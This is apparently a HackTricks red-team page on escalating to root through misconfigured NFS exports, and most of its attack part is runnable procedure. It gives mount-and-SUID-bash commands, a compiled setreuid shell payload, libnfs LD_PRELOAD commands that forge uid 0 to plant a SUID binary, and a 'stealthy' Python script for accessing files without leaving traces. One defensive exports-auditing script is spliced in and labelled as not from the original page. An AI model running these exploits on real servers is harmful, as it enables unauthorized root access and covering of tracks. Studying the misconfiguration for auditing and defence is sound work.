NFS no_root_squash/no_all_squash misconfiguration PE

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Read the _/etc/exports_ file. If you find a directory that is exported with no_root_squash, you can mount it from a client and write inside that directory as if you were the local root of the server.

no_root_squash: This option basically gives the root user on the client authority to access files on the NFS server as root. This can have severe security implications.

no_all_squash: This is similar to the no_root_squash option but applies to non-root users. Imagine you have a shell as the "nobody" user; you check the /etc/exports file and the no_all_squash option is present; you check the /etc/passwd file; you emulate a non-root user; you create a suid file as that user (by mounting via NFS). Execute the suid file as the "nobody" user and become that different user.
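The two options above (and the insecure flag the local exploit later depends on) are easy to miss in a long exports file. The following is an added auditing example, not code from the original page; it parses the /etc/exports syntax (path, then host(option,...) entries) and reports the weak options per export and host. The sample exports text is constructed; the file path argument is an assumption.

```python
#!/usr/bin/env python3
# Added example (not from the original page): flag weak options in /etc/exports.
# Usage: python3 exports_audit.py /etc/exports   (defaults to the constructed sample)
import sys

# Options that weaken NFS's uid squashing / client authentication model.
RISKY = {
    "no_root_squash": "client root is honoured as uid 0 on the server",
    "no_all_squash": "client uids are honoured, so any local uid can be impersonated",
    "insecure": "requests from unprivileged source ports (>1024) are accepted",
}

# Constructed sample, not a real host configuration.
SAMPLE_EXPORTS = """\
# constructed sample
/srv/backup   10.0.0.0/24(rw,sync,no_root_squash)
/srv/public   *(ro,sync,root_squash)
/srv/scratch  192.168.1.5(rw,insecure,no_all_squash) 192.168.1.0/24(ro)
/srv/data     host1(rw,all_squash,anonuid=65534,anongid=65534)
"""


def parse_exports(text):
    """Yield (path, host, [options]) for every client entry in exports syntax."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        for token in rest.split():
            host, _, optstr = token.partition("(")   # "host(opt,opt)" or "host"
            opts = [o for o in optstr.rstrip(")").split(",") if o]
            yield path, host or "*", opts          # "(opts)" alone means every host


def audit_exports(text):
    """Return (path, host, option, reason) findings for risky export options."""
    findings = []
    for path, host, opts in parse_exports(text):
        for opt in opts:
            if opt in RISKY:
                findings.append((path, host, opt, RISKY[opt]))
        if host == "*" and "rw" in opts:
            findings.append((path, host, "rw", "world-writable export"))
    return findings


if __name__ == "__main__":
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXPORTS
    for path, host, opt, why in audit_exports(src):
        print(f"{path} {host}: {opt} -> {why}")
```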

Privilege Escalation

Remote Exploit

If you have found this vulnerability, you can exploit it:

  • Mount that directory on a client machine, and as root copy the /bin/bash binary into the mounted folder, give it SUID rights, and execute that bash binary from the victim machine.

#Attacker, as root user
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash

#Victim
cd <SHARED_FOLDER>
./bash -p #ROOT shell

  • Mount that directory on a client machine, and as root copy our compiled payload that abuses the SUID permission into the mounted folder, give it SUID rights, and execute that binary from the victim machine (you can find some C SUID payloads here).

#Attacker, as root user
gcc payload.c -o payload
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /tmp/payload .
chmod +s payload

#Victim
cd <SHARED_FOLDER>
./payload #ROOT shell

Local Exploit

Note that if you can create a tunnel from your machine to the victim machine, you can still use the Remote version to exploit this privilege escalation by tunnelling the required ports. The following trick is for the case where the /etc/exports file specifies an IP address. In that case you will not be able to use the remote exploit at all and will need to use this trick. Another requirement for the exploit to work is that the export inside /etc/exports must use the insecure flag. --I'm not sure whether this trick will work if /etc/exports specifies an IP address--

Basic Information

The scenario involves exploiting an NFS share mounted on a local machine, leveraging a flaw in the NFSv3 specification that allows the client to specify its own uid/gid, potentially enabling unauthorized access. The exploit uses libnfs, a library that allows NFS RPC calls to be forged.

Compiling the Library

The library compilation steps may require adjustments depending on the kernel version. In this specific case, the fallocate syscalls were commented out. The compilation process consists of the following commands:

./bootstrap
./configure
make
gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/

Conducting the Exploit

The exploit involves creating a simple C program (pwn.c) that elevates privileges to root and then executes a shell. The program is compiled, and the resulting binary (a.out) is placed on the share with suid root, using ld_nfs.so to fake the uid in the RPC calls:

  1. Compile the exploit code:

cat pwn.c
#include <stdlib.h>
#include <unistd.h>
int main(void){setreuid(0,0); system("/bin/bash"); return 0;}
gcc pwn.c -o a.out

  2. Place the exploit on the share and change its permissions by faking the uid:

LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out
  3. Execute the exploit to gain root privileges:

/mnt/share/a.out
#root

Bonus: NFShell for Stealthy File Access

Once root access is obtained, a Python script (nfsh.py) is used to interact with the NFS share without changing ownership (to avoid leaving traces). The script changes the uid to match that of the file being accessed, allowing interaction with files on the share without permission issues:

#!/usr/bin/env python
# script from https://www.errno.fr/nfs_privesc.html
import sys
import os


def get_file_uid(filepath):
    # Return the uid owning filepath; if it cannot be stat'ed (e.g. a path
    # being created), fall back to the owner of the closest parent directory.
    try:
        uid = os.stat(filepath).st_uid
    except OSError:
        return get_file_uid(os.path.dirname(filepath))
    return uid


# The last argument is taken as the target path; the rest is the command to run.
filepath = sys.argv[-1]
uid = get_file_uid(filepath)
# Switch to the file owner's uid before running the command (requires root).
os.setreuid(uid, uid)
os.system(' '.join(sys.argv[1:]))

# ll ./mount/
drwxr-x---  6 1008 1009 1024 Apr  5  2017 9.3_old

References
